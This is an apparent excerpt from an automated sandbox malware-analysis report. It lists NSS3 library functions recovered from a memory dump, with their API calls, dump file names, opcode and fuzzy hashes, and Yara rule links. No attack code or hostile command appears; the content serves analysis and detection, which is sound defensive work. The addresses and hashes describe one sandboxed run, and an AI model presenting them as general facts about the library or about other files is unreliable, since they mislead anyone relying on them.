                                                                                • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDE2D
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDE43
                                                                                • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDE76
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDF32
                                                                                • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDF5F
                                                                                • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDF78
                                                                                • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDFAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                • String ID:
                                                                                • API String ID: 1886645929-0
                                                                                • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                • Instruction ID: 1ab13e301cee481bdd17b7f058efbb68acb33cad7e925665b997f6ab13f2975c
                                                                                • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                • Instruction Fuzzy Hash: 7481D571A06605ABFF148E59C8A83EA72D6DBEC348F20843AD959CBEE1D774C4C0C702
                                                                                Function 6CFC3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CFC3C76
                                                                                • CERT_DestroyCertificate.NSS3(00000000), ref: 6CFC3C94
                                                                                  • Part of subcall function 6CFB95B0: TlsGetValue.KERNEL32(00000000,?,6CFD00D2,00000000), ref: 6CFB95D2
                                                                                  • Part of subcall function 6CFB95B0: EnterCriticalSection.KERNEL32(?,?,?,6CFD00D2,00000000), ref: 6CFB95E7
                                                                                  • Part of subcall function 6CFB95B0: PR_Unlock.NSS3(?,?,?,?,6CFD00D2,00000000), ref: 6CFB9605
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFC3CB2
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CFC3CCA
                                                                                • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CFC3CE1
                                                                                  • Part of subcall function 6CFC3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFDAE42), ref: 6CFC30AA
                                                                                  • Part of subcall function 6CFC3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFC30C7
                                                                                  • Part of subcall function 6CFC3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CFC30E5
                                                                                  • Part of subcall function 6CFC3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFC3116
                                                                                  • Part of subcall function 6CFC3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFC312B
                                                                                  • Part of subcall function 6CFC3090: PK11_DestroyObject.NSS3(?,?), ref: 6CFC3154
                                                                                  • Part of subcall function 6CFC3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC317E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                • String ID:
                                                                                • API String ID: 3167935723-0
                                                                                • Opcode ID: 53e2031536a55c23093e9e0d067e6a4c545ab8d22ccfb77f6b268d61d84554a2
                                                                                • Instruction ID: ebd37b75df33dddef1caa612fa171f3a2a3542097c309daf0546d767854fb792
                                                                                • Opcode Fuzzy Hash: 53e2031536a55c23093e9e0d067e6a4c545ab8d22ccfb77f6b268d61d84554a2
                                                                                • Instruction Fuzzy Hash: 6D61B5B1B00201ABEF105E65DC41FEB76B9EF04788F094028FE159B662F762D91CC7A2
                                                                                Function 6D003D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6D003440: PK11_GetAllTokens.NSS3 ref: 6D003481
                                                                                  • Part of subcall function 6D003440: PR_SetError.NSS3(00000000,00000000), ref: 6D0034A3
                                                                                  • Part of subcall function 6D003440: TlsGetValue.KERNEL32 ref: 6D00352E
                                                                                  • Part of subcall function 6D003440: EnterCriticalSection.KERNEL32(?), ref: 6D003542
                                                                                  • Part of subcall function 6D003440: PR_Unlock.NSS3(?), ref: 6D00355B
                                                                                • TlsGetValue.KERNEL32 ref: 6D003D8B
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D003D9F
                                                                                • PR_Unlock.NSS3(?), ref: 6D003DCA
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6D003DE2
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D003E4F
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • TlsGetValue.KERNEL32 ref: 6D003E97
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D003EAB
                                                                                • PR_Unlock.NSS3(?), ref: 6D003ED6
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6D003EEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                • String ID:
                                                                                • API String ID: 2554137219-0
                                                                                • Opcode ID: 37838798ccf6e668537ecef22a550f182561a5620d9bb89b281099d1616d2d83
                                                                                • Instruction ID: 7877735a528252008c291777492f1698265fccbdd6875fad0b400e9a2760c925
                                                                                • Opcode Fuzzy Hash: 37838798ccf6e668537ecef22a550f182561a5620d9bb89b281099d1616d2d83
                                                                                • Instruction Fuzzy Hash: 20513571900601AFFB129F68EC41F6A73B4FF49314F054229DE194B262EB71E950CBD1
                                                                                Function 6CFB2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ZAlloc_Util.NSS3(B90B38E4), ref: 6CFB2C5D
                                                                                  • Part of subcall function 6D010D30: calloc.MOZGLUE ref: 6D010D50
                                                                                  • Part of subcall function 6D010D30: TlsGetValue.KERNEL32 ref: 6D010D6D
                                                                                • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CFB2C8D
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFB2CE0
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CFB2CDA,?,00000000), ref: 6CFB2E1E
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CFB2E33
                                                                                  • Part of subcall function 6CFB2E00: TlsGetValue.KERNEL32 ref: 6CFB2E4E
                                                                                  • Part of subcall function 6CFB2E00: EnterCriticalSection.KERNEL32(?), ref: 6CFB2E5E
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableLookup.NSS3(?), ref: 6CFB2E71
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableRemove.NSS3(?), ref: 6CFB2E84
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CFB2E96
                                                                                  • Part of subcall function 6CFB2E00: PR_Unlock.NSS3 ref: 6CFB2EA9
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFB2D23
                                                                                • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CFB2D30
                                                                                • CERT_MakeCANickname.NSS3(00000001), ref: 6CFB2D3F
                                                                                • free.MOZGLUE(00000000), ref: 6CFB2D73
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFB2DB8
                                                                                • free.MOZGLUE ref: 6CFB2DC8
                                                                                  • Part of subcall function 6CFB3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFB3EC2
                                                                                  • Part of subcall function 6CFB3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CFB3ED6
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFB3EEE
                                                                                  • Part of subcall function 6CFB3E60: PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFB3F02
                                                                                  • Part of subcall function 6CFB3E60: PL_FreeArenaPool.NSS3 ref: 6CFB3F14
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFB3F27
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                • String ID:
                                                                                • API String ID: 3941837925-0
                                                                                • Opcode ID: 69e477982afb637a0faac7ba8c104fc9903b56f1fea1b2a590eb9c5e331813c9
                                                                                • Instruction ID: 7fb22d5fa3ca1ffca24272cd3aa3ddcf76359c3f9f36071d388e6f3b3d049356
                                                                                • Opcode Fuzzy Hash: 69e477982afb637a0faac7ba8c104fc9903b56f1fea1b2a590eb9c5e331813c9
                                                                                • Instruction Fuzzy Hash: 6051F172A043129BEB00DF6ADC89B5B77E5EF88348F15052CEC55A7610EB32E815CB92
                                                                                Function 6CFB7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6CFB40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CFB3F7F,?,00000055,?,?,6CFB1666,?,?), ref: 6CFB40D9
                                                                                  • Part of subcall function 6CFB40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CFB1666,?,?), ref: 6CFB40FC
                                                                                  • Part of subcall function 6CFB40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CFB1666,?,?), ref: 6CFB4138
                                                                                • PR_GetCurrentThread.NSS3 ref: 6CFB7CFD
                                                                                  • Part of subcall function 6D079BF0: TlsGetValue.KERNEL32(?,?,?,6D0C0A75), ref: 6D079C07
                                                                                • SECITEM_ItemsAreEqual_Util.NSS3(?,6D0D9030), ref: 6CFB7D1B
                                                                                  • Part of subcall function 6D00FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CFB1A3E,00000048,00000054), ref: 6D00FD56
                                                                                • SECITEM_ItemsAreEqual_Util.NSS3(?,6D0D9048), ref: 6CFB7D2F
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CFB7D50
                                                                                • PR_GetCurrentThread.NSS3 ref: 6CFB7D61
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6CFB7D7D
                                                                                • free.MOZGLUE(?), ref: 6CFB7D9C
                                                                                • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CFB7DB8
                                                                                • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CFB7E19
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                • String ID:
                                                                                • API String ID: 70581797-0
                                                                                • Opcode ID: db20a2043f10a1c1e6b760483162b69380ce43b300750c88e61522c49bbd8580
                                                                                • Instruction ID: 819e458369e39383ba9984992b150a992b6d1403a41c69578b1282a6771f8730
                                                                                • Opcode Fuzzy Hash: db20a2043f10a1c1e6b760483162b69380ce43b300750c88e61522c49bbd8580
                                                                                • Instruction Fuzzy Hash: 0841F872A041199FEF009E6AAC41BAF37E4AF4839CF050126ED19BB651E730E915C7F1
                                                                                Function 6D014DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6D01536F,00000022,?,?,00000000,?), ref: 6D014E70
                                                                                • PORT_ZAlloc_Util.NSS3(00000000), ref: 6D014F28
                                                                                • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6D014F8E
                                                                                • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6D014FAE
                                                                                • free.MOZGLUE(?), ref: 6D014FC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                • String ID: %s=%c%s%c$%s=%s
                                                                                • API String ID: 2709355791-2032576422
                                                                                • Opcode ID: 5035aefcd6f4fc6b5c54cb52374bc7736565f25a9f8d137a64a42526e8f04ecc
                                                                                • Instruction ID: 89d131344b3d183a152b76b42a07f0749b98d36cd8a88cc2217d89647d6ca067
                                                                                • Opcode Fuzzy Hash: 5035aefcd6f4fc6b5c54cb52374bc7736565f25a9f8d137a64a42526e8f04ecc
                                                                                • Instruction Fuzzy Hash: D8510371A0C157ABFB01CAEA8C907FE7BF5BF4A308F584029E894A7361D725D80587A1
                                                                                Function 6CF57D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57E27
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57E67
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CF57EED
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF57F2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 912837312-598938438
                                                                                • Opcode ID: bd42890eb6530555334c168a66c6184a9b908c15047e67d1b47b435a96b9bc93
                                                                                • Instruction ID: 7485435c45cd4b5260bb5b55199db76a71e7aa831be3491ac3fd3383d9128e7d
                                                                                • Opcode Fuzzy Hash: bd42890eb6530555334c168a66c6184a9b908c15047e67d1b47b435a96b9bc93
                                                                                • Instruction Fuzzy Hash: 1E61D175B043059FDB05CF25C880BAA77A2BF59308F5584AAEE094F752D731EC61CBA1
                                                                                Function 6CF3FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3FD7A
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3FD94
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3FE3C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3FE83
                                                                                  • Part of subcall function 6CF3FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CF3FEFA
                                                                                  • Part of subcall function 6CF3FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CF3FF3B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 1169254434-598938438
                                                                                • Opcode ID: 09c6a15f387144030d4336a77aaa440ac738e80e667ce662ea1a2c6d50b5fae8
                                                                                • Instruction ID: 176c0cbcabca6bf9ebab4d415d4474858df244bafa4f95cf0db037aab9366c9b
                                                                                • Opcode Fuzzy Hash: 09c6a15f387144030d4336a77aaa440ac738e80e667ce662ea1a2c6d50b5fae8
                                                                                • Instruction Fuzzy Hash: BC518371A002159FDB44CFA9D890BAEB7B1FF48308F1450A9D909AB792E735ED90CB91
                                                                                Function 6CFC8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(00000000,00000000,?,6CFD124D,00000001), ref: 6CFC8D19
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6CFD124D,00000001), ref: 6CFC8D32
                                                                                • PL_ArenaRelease.NSS3(?,?,?,?,?,6CFD124D,00000001), ref: 6CFC8D73
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CFD124D,00000001), ref: 6CFC8D8C
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CFD124D,00000001), ref: 6CFC8DBA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                • String ID: KRAM$KRAM
                                                                                • API String ID: 2419422920-169145855
                                                                                • Opcode ID: e755819a3b7b155a0ea77c4069e3ea2051730a8c15a7586a75210bdf189f8b73
                                                                                • Instruction ID: 60cd5f85c97dabee10c06ed92a3f4f5cc52f8bbbace265b3e4d7d0ed931b4066
                                                                                • Opcode Fuzzy Hash: e755819a3b7b155a0ea77c4069e3ea2051730a8c15a7586a75210bdf189f8b73
                                                                                • Instruction Fuzzy Hash: 80214DB5B046028FDB00AF78C58476BB7F1FF45318F15896AD99987701EB34D892CB92
                                                                                Function 6CFEACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CFEACE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFEAD14
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFEAD23
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFEAD39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                • API String ID: 332880674-3521875567
                                                                                • Opcode ID: 528ac974080cc9141c6985bf1a258d6e3c038e18c60add0b26dd50254981541f
                                                                                • Instruction ID: 63d55dea20a15f770ff48a9faf9d297e45bc66cf47f3d799346a6da5f86dd369
                                                                                • Opcode Fuzzy Hash: 528ac974080cc9141c6985bf1a258d6e3c038e18c60add0b26dd50254981541f
